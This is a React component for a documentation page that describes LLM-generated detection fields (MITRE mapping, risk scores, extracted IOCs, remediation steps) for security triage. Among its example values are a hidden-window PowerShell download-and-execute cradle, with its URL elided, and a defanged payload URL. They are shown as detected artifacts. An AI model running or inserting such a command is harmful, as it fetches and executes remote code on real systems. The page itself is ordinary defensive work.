import React from 'react';
import '../field-detection.css';

const FieldDetection = () => {
  return (
    <div className="field-detection-page">
      <div className="fd-page-inner">
        {/* Top bar */}
        <div className="fd-top-bar">
          <div className="fd-brand">
            <div>
              <div className="fd-brand-text-primary">FieldDescriptionDetection Use</div>
              <div className="fd-brand-text-secondary">
                LLM‑enriched detection context for faster, higher‑confidence triage.
              </div>
            </div>
          </div>
          <div className="fd-top-badge">
            <span className="fd-pill-dot"></span>
            <span>Threat‑aware enrichment · MITRE &amp; Kill Chain aligned</span>
          </div>
        </div>

        {/* Hero */}
        <section className="fd-hero">
          <div className="fd-hero-text">
            <h1>
              Turn noisy events into
              <span className="fd-hero-gradient"> explainable, prioritized alerts</span>.
            </h1>
            <p className="fd-hero-subtitle">
              The <strong>FieldDescriptionDetection</strong> layer converts raw logs into analyst‑ready
              signals: mapped to MITRE, scored for risk and severity, enriched with explanations,
              IOCs and remediation guidance – all generated by LLMs but constrained by your detection strategy.
            </p>
            <div className="fd-hero-metadata">
              <div className="fd-meta-pill">
                <strong>20+</strong> LLM‑driven enrichment fields
              </div>
              <div className="fd-meta-pill">
                <strong>&lt; 30 sec</strong> to understand complex alerts
              </div>
              <div className="fd-meta-pill">
                <strong>Kill Chain</strong> + MITRE in every event
              </div>
            </div>
          </div>

          <div className="fd-hero-visual-wrap">
            <div className="fd-hero-visual">
              <div className="fd-mini-matrix">
                <div className="fd-mini-matrix-header">
                  <div className="fd-mini-matrix-title">LLM Detection Matrix</div>
                  <div className="fd-mini-matrix-tag">
                    <span className="fd-tag-dot"></span>
                    Severity × Confidence × Risk
                  </div>
                </div>
                <div className="fd-mini-matrix-grid">
                  {matrixData.map((item, index) => (
                    <div key={index} className="fd-matrix-cell">
                      <div className="fd-matrix-cell-label">{item.label}</div>
                      <div className="fd-pill-inline">
                        <span className={`fd-pill-inline-dot ${item.pillClass}`}></span>
                        <span>{item.pillText}</span>
                      </div>
                      <div style={{ marginTop: '0.25rem', fontSize: '0.76rem' }}>
                        {item.description}
                      </div>
                    </div>
                  ))}
                </div>
              </div>
            </div>
          </div>
        </section>

        {/* Classification */}
        <section>
          <h2 className="fd-section-title">Classification</h2>
          <p className="fd-section-subtitle">
            High‑level and fine‑grained labels that answer <strong>"what kind of attack is this?"</strong>,
            how it maps to MITRE ATT&amp;CK, and where you are in the cyber kill chain.
          </p>

          <div className="fd-field-grid">
            {classificationFields.map((field, index) => (
              <div key={index} className="fd-field-card">
                <div className="fd-field-label">{field.label}</div>
                <div className="fd-field-name">{field.name}</div>
                <div className="fd-field-role">{field.role}</div>
                <div className="fd-field-meta-row">
                  {field.meta.map((m, i) => (
                    <div key={i} className="fd-field-meta-pill">
                      <strong>{m.key}</strong> {m.value}
                    </div>
                  ))}
                </div>
                <div className="fd-field-body">{field.body}</div>
                <div className="fd-field-example-label">Example value</div>
                <div className="fd-field-example">{field.example}</div>
              </div>
            ))}
          </div>
        </section>

        {/* Scoring */}
        <section>
          <h2 className="fd-section-title">Scoring</h2>
          <p className="fd-section-subtitle">
            Quantitative fields that answer <strong>"how bad is this and how sure are we?"</strong>,
            enabling threshold tuning and prioritization.
          </p>

          <div className="fd-field-grid">
            {scoringFields.map((field, index) => (
              <div key={index} className="fd-field-card">
                <div className="fd-field-label">{field.label}</div>
                <div className="fd-field-name">{field.name}</div>
                <div className="fd-field-role">{field.role}</div>
                <div className="fd-field-meta-row">
                  {field.meta.map((m, i) => (
                    <div key={i} className="fd-field-meta-pill">
                      <strong>{m.key}</strong> {m.value}
                    </div>
                  ))}
                </div>
                <div className="fd-field-body">{field.body}</div>
                <div className="fd-field-example-label">Example value</div>
                <div className="fd-field-example">{field.example}</div>
              </div>
            ))}
          </div>
        </section>

        {/* Context */}
        <section>
          <h2 className="fd-section-title">Context</h2>
          <p className="fd-section-subtitle">
            Fields that explain <strong>why</strong> the event is suspicious, what data and IOCs are involved,
            and what else was happening around it.
          </p>

          <div className="fd-field-grid">
            {contextFields.map((field, index) => (
              <div key={index} className="fd-field-card">
                <div className="fd-field-label">{field.label}</div>
                <div className="fd-field-name">{field.name}</div>
                <div className="fd-field-role">{field.role}</div>
                <div className="fd-field-meta-row">
                  {field.meta.map((m, i) => (
                    <div key={i} className="fd-field-meta-pill">
                      <strong>{m.key}</strong> {m.value}
                    </div>
                  ))}
                </div>
                <div className="fd-field-body">{field.body}</div>
                <div className="fd-field-example-label">Example value</div>
                <div className="fd-field-example">{field.example}</div>
              </div>
            ))}
          </div>
        </section>

        {/* Response */}
        <section>
          <h2 className="fd-section-title">Response</h2>
          <p className="fd-section-subtitle">
            Fields that translate detection into <strong>immediate actions and guided remediation</strong>
            for both automation and human responders.
          </p>

          <div className="fd-field-grid">
            {responseFields.map((field, index) => (
              <div key={index} className="fd-field-card">
                <div className="fd-field-label">{field.label}</div>
                <div className="fd-field-name">{field.name}</div>
                <div className="fd-field-role">{field.role}</div>
                <div className="fd-field-meta-row">
                  {field.meta.map((m, i) => (
                    <div key={i} className="fd-field-meta-pill">
                      <strong>{m.key}</strong> {m.value}
                    </div>
                  ))}
                </div>
                <div className="fd-field-body">{field.body}</div>
                <div className="fd-field-example-label">Example value</div>
                <div className="fd-field-example">{field.example}</div>
              </div>
            ))}
          </div>
        </section>

    
      </div>
    </div>
  );
};

// Data arrays
const matrixData = [
  {
    label: 'Alert Priority',
    pillClass: 'fd-pill-critical',
    pillText: 'CRITICAL · HIGH',
    description: (
      <>
        Driven by <code>llm_severity</code> and <code>llm_threat_category</code>.
      </>
    )
  },
  {
    label: 'Model Confidence',
    pillClass: 'fd-pill-high',
    pillText: '> 0.8 confidence',
    description: (
      <>
        Use <code>llm_confidence_score</code> to tune alert thresholds per source.
      </>
    )
  },
  {
    label: 'Risk Context',
    pillClass: 'fd-pill-medium',
    pillText: 'User / Asset risk',
    description: (
      <>
        Combine <code>llm_user_risk_score</code> + <code>llm_asset_criticality</code> + <code>llm_anomaly_score</code> for end‑to‑end prioritization.
      </>
    )
  }
];

const classificationFields = [
  {
    label: 'Threat Category',
    name: 'llm_threat_category',
    role: 'High‑level classification such as "fileless_malware", "lateral_movement", "data_exfiltration".',
    meta: [
      { key: 'Detection use', value: 'Primary detection field' },
      { key: 'Focus', value: 'High‑level threat classification' }
    ],
    body: 'Use this to bucket alerts and route playbooks (e.g., exfiltration vs credential theft workflows).',
    example: '"data_exfiltration"'
  },
  {
    label: 'Attack Pattern',
    name: 'llm_attack_pattern',
    role: 'Specific pattern such as "macro_based_malware", "credential_dumping".',
    meta: [
      { key: 'Detection use', value: 'Fine‑grained detection' },
      { key: 'Focus', value: 'Specific attack pattern' }
    ],
    body: 'Drive rule tuning and correlation by clustering similar attacks across sources.',
    example: '"credential_dumping"'
  },
  {
    label: 'MITRE Technique',
    name: 'llm_mitre_technique',
    role: 'Automatically mapped MITRE ATT&CK IDs, e.g. "T1059, T1566.001".',
    meta: [
      { key: 'Detection use', value: 'TTP‑based detection' },
      { key: 'Focus', value: 'ATT&CK techniques' }
    ],
    body: 'Use for coverage reporting, ATT&CK dashboards and TTP‑level correlation across tools.',
    example: '"T1059.001,T1105"'
  },
  {
    label: 'Kill Chain Stage',
    name: 'llm_kill_chain_stage',
    role: 'Cyber Kill Chain stage such as reconnaissance, delivery, exploitation, installation, C2, actions.',
    meta: [
      { key: 'Detection use', value: 'Attack progression tracking' },
      { key: 'Focus', value: 'Stage in kill chain' }
    ],
    body: 'Helps analysts see where to intervene and how far the attack progressed.',
    example: '"exploitation"'
  }
];

const scoringFields = [
  {
    label: 'Confidence Score',
    name: 'llm_confidence_score',
    role: 'LLM\'s confidence (0.0–1.0) that the event is malicious or security‑relevant.',
    meta: [
      { key: 'Detection use', value: 'Threshold tuning' },
      { key: 'Focus', value: 'Maliciousness confidence' }
    ],
    body: 'Use to tune alert thresholds per source, user or asset without editing rules.',
    example: '0.92'
  },
  {
    label: 'Severity',
    name: 'llm_severity',
    role: 'Discrete alert severity: CRITICAL, HIGH, MEDIUM, LOW, INFO.',
    meta: [
      { key: 'Detection use', value: 'Alert prioritization' },
      { key: 'Focus', value: 'Impact level' }
    ],
    body: 'Drive queue ordering, escalation and paging from this field.',
    example: '"CRITICAL"'
  },
  {
    label: 'User Risk Score',
    name: 'llm_user_risk_score',
    role: 'Risk score for the user (0–100) based on current and historical behavior.',
    meta: [
      { key: 'Detection use', value: 'User behavior analytics' },
      { key: 'Focus', value: 'User‑centric risk' }
    ],
    body: 'Combine with severity to up‑rank high‑risk users and suppress low‑risk noise.',
    example: '83'
  },
  {
    label: 'Asset Criticality',
    name: 'llm_asset_criticality',
    role: 'How critical the affected asset is: HIGH, MEDIUM, LOW.',
    meta: [
      { key: 'Detection use', value: 'Asset‑based prioritization' },
      { key: 'Focus', value: 'Business impact' }
    ],
    body: 'Use this to prioritize crown‑jewel systems even for medium‑severity detections.',
    example: '"HIGH"'
  },
  {
    label: 'Anomaly Score',
    name: 'llm_anomaly_score',
    role: 'How anomalous this event is for this user/asset (0–100).',
    meta: [
      { key: 'Detection use', value: 'Anomaly detection' },
      { key: 'Focus', value: 'Behavioral deviation' }
    ],
    body: 'Combine with confidence to highlight weird but high‑risk behavior that rules might miss.',
    example: '72'
  },
  {
    label: 'False Positive Likelihood',
    name: 'llm_false_positive_likelihood',
    role: 'Probability this is a false positive (0.0–1.0).',
    meta: [
      { key: 'Detection use', value: 'FP filtering' },
      { key: 'Focus', value: 'Noise reduction' }
    ],
    body: 'Use to soft‑suppress high‑FP alerts or route them to lower‑priority queues.',
    example: '0.18'
  }
];

const contextFields = [
  {
    label: 'Suspicious Flag',
    name: 'llm_is_suspicious',
    role: 'Boolean: true if the LLM deems the event suspicious.',
    meta: [
      { key: 'Detection use', value: 'Quick filtering' },
      { key: 'Focus', value: 'Binary suspicion flag' }
    ],
    body: 'Use for fast dashboards and views where you only want AI‑flagged events.',
    example: 'true'
  },
  {
    label: 'Explanation',
    name: 'llm_explanation',
    role: 'Natural‑language explanation of why this event is suspicious.',
    meta: [
      { key: 'Detection use', value: 'Analyst context' }
    ],
    body: 'Show at the top of the alert to cut time‑to‑understand for L1/L2 analysts.',
    example: '"This PowerShell command downloads an executable from a newly registered domain and runs it without touching disk."'
  },
  {
    label: 'Extracted IOCs',
    name: 'llm_iocs_extracted',
    role: 'Automatically extracted IOCs (IPs, URLs, hashes, domains) from the event.',
    meta: [
      { key: 'Detection use', value: 'IOC hunting' }
    ],
    body: 'Push directly into IOC search, enrichment and threat intel workflows.',
    example: '["198.51.100.23","hxxp://malicious‑cdn[.]com/payload.exe","f4b645…"]'
  },
  {
    label: 'Similar Attacks',
    name: 'llm_similar_attacks',
    role: 'Known malware families or campaigns with similar patterns.',
    meta: [
      { key: 'Detection use', value: 'Threat intel correlation' }
    ],
    body: 'Helps analysts quickly see if the alert matches known malware families or recent campaigns.',
    example: '["Emotet","TrickBot‑style lateral movement"]'
  },
  {
    label: 'Attack Narrative',
    name: 'llm_attack_narrative',
    role: 'Human‑readable attack story, e.g. "Phishing → Macro → PowerShell → Execution".',
    meta: [
      { key: 'Detection use', value: 'Investigation context' }
    ],
    body: 'Use in incident views to give a timeline in one sentence.',
    example: '"User clicked a phishing email link, opened a macro‑enabled document, which spawned PowerShell that connected to a C2 server."'
  },
  {
    label: 'Decoded Command',
    name: 'llm_decoded_command',
    role: 'Decoded / de‑obfuscated commands (Base64, hex, etc.) extracted from the event.',
    meta: [
      { key: 'Detection use', value: 'Command analysis' }
    ],
    body: 'Expose this directly for reverse‑engineering suspicious scripts without extra tools.',
    example: '"powershell -nop -w hidden -c IEX (New‑Object Net.WebClient).DownloadString(\'https://…\')"'
  },
  {
    label: 'Data Classification',
    name: 'llm_data_classification',
    role: 'Type of data involved: PII, credentials, financial, etc.',
    meta: [
      { key: 'Detection use', value: 'Data loss prevention' }
    ],
    body: 'Combine with severity and asset criticality to prioritize data‑at‑risk incidents.',
    example: '"credentials"'
  },
  {
    label: 'Context Window',
    name: 'llm_context_window',
    role: 'Summary of related events in a time window, e.g. "User logged in 5 min ago from VPN".',
    meta: [
      { key: 'Detection use', value: 'Contextual awareness' }
    ],
    body: 'Show above the raw event so analysts see recent logins, changes or alerts in context.',
    example: '"User authenticated from corporate VPN 4 minutes prior; no failed logins in last 24h."'
  }
];

const responseFields = [
  {
    label: 'Recommended Action',
    name: 'llm_recommended_action',
    role: 'Suggested immediate action: BLOCK, ISOLATE, MONITOR, INVESTIGATE.',
    meta: [
      { key: 'Detection use', value: 'Automated response' },
      { key: 'Focus', value: 'Next best action' }
    ],
    body: 'Map directly into SOAR playbooks or response policies for fast containment.',
    example: '"ISOLATE"'
  },
  {
    label: 'Remediation Steps',
    name: 'llm_remediation_steps',
    role: 'Contextual, step‑by‑step remediation guidance tailored to the alert.',
    meta: [
      { key: 'Detection use', value: 'Automated / guided response' }
    ],
    body: 'Use in runbooks or chat‑ops bots to walk responders through containment, eradication and recovery.',
    example: '"1) Isolate the host from the network. 2) Revoke exposed credentials. 3) Scan for additional persistence mechanisms. 4) Block the C2 domain on the proxy."'
  }
];

export default FieldDetection;